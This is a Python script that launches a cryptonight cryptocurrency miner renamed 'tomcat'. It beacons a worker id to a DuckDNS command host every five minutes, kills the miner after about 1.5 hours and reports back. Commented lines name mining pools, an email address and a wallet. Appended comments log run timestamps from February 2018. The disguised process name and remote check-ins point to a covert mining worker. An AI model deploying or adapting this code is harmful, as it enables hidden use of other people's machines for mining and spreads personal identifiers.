import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:28:04.654124
#2018-02-17 16:14:06.075205
#2018-02-17 18:02:05.082420
#2018-02-17 19:49:06.593809
#2018-02-17 21:36:05.109674
#2018-02-17 23:20:10.004163
#2018-02-18 01:08:04.400177
#2018-02-18 02:56:01.794447
#2018-02-18 04:44:04.944592
#2018-02-18 06:36:01.548077
#2018-02-18 08:23:07.988436
#2018-02-18 10:12:05.012840
#2018-02-18 11:58:03.487123
#2018-02-18 13:42:07.925084
#2018-02-18 15:33:06.215850
#2018-02-18 17:21:06.303179
#2018-02-18 19:10:08.401659
#2018-02-18 20:56:07.226899
#2018-02-18 22:42:05.462012
#2018-02-19 00:31:07.158346
#2018-02-19 02:16:01.654439
#2018-02-19 04:03:05.055894
#2018-02-19 05:47:04.667078
#2018-02-19 07:34:07.385405
#2018-02-19 09:24:06.120238
#2018-02-19 11:13:06.812437
#2018-02-19 13:01:07.688835
#2018-02-19 14:48:01.960089
#2018-02-19 16:36:06.882205
#2018-02-19 18:23:01.356347
#2018-02-19 20:10:06.704352
#2018-02-19 22:00:08.200044
#2018-02-19 23:47:08.844741
#2018-02-20 01:34:06.498891
#2018-02-20 03:22:05.884066
#2018-02-20 05:08:04.302691
#2018-02-20 06:50:09.067154
#2018-02-20 08:37:06.285435
#2018-02-20 10:21:02.164941
#2018-02-20 12:07:07.217414
#2018-02-20 13:53:01.917639
#2018-02-20 15:39:02.147828
#2018-02-20 17:24:05.985706
#2018-02-20 19:14:08.606990
#2018-02-20 21:04:04.407493
#2018-02-20 22:50:09.027892
#2018-02-21 00:34:05.316324
#2018-02-21 02:22:06.554836
#2018-02-21 04:08:05.634550
#2018-02-21 05:55:07.732585
#2018-02-21 07:45:05.969107
#2018-02-21 09:32:06.790985
#2018-02-21 11:22:04.188102
#2018-02-21 13:12:09.661641
#2018-02-21 14:59:06.099042
#2018-02-21 16:48:08.040458
#2018-02-21 18:33:06.839782
#2018-02-21 20:19:05.690973
#2018-02-21 22:06:07.890475
#2018-02-21 23:53:07.403876
#2018-02-22 01:43:05.554054
#2018-02-22 03:32:06.497761
#2018-02-22 05:18:04.925770
#2018-02-22 07:04:05.084810
#2018-02-22 08:50:07.877417
#2018-02-22 10:38:07.966067
#2018-02-22 12:26:07.257684
#2018-02-22 14:11:08.647955
#2018-02-22 15:58:01.912242
#2018-02-22 17:44:01.300451
#2018-02-22 19:32:05.121892
#2018-02-22 21:26:04.920933
#2018-02-22 23:12:08.438476
#2018-02-23 00:58:03.584011
#2018-02-23 02:47:05.534953
#2018-02-23 04:35:07.784872
#2018-02-23 06:21:06.880961
#2018-02-23 08:09:06.365237
#2018-02-23 10:24:08.187476
#2018-02-23 12:18:08.099659
#2018-02-23 14:08:04.781639
#2018-02-23 15:58:08.085682
#2018-02-23 17:43:07.875010
#2018-02-23 19:29:06.730206
#2018-02-23 21:12:04.844590
#2018-02-23 22:59:02.175581
#2018-02-24 00:46:05.249450
#2018-02-24 02:42:07.840201
#2018-02-24 05:28:06.981075
#2018-02-24 07:15:05.658330
#2018-02-24 09:06:05.156842
#2018-02-24 10:44:06.954186
#2018-02-24 12:27:05.671612
#2018-02-24 14:06:03.998608
#2018-02-24 15:44:06.811204
#2018-02-24 17:18:06.998082
#2018-02-24 18:52:03.965674
#2018-02-24 20:24:06.218692
#2018-02-24 21:55:06.722660
#2018-02-25 00:38:07.223231
#2018-02-25 02:40:08.447767
#2018-02-25 06:29:01.232365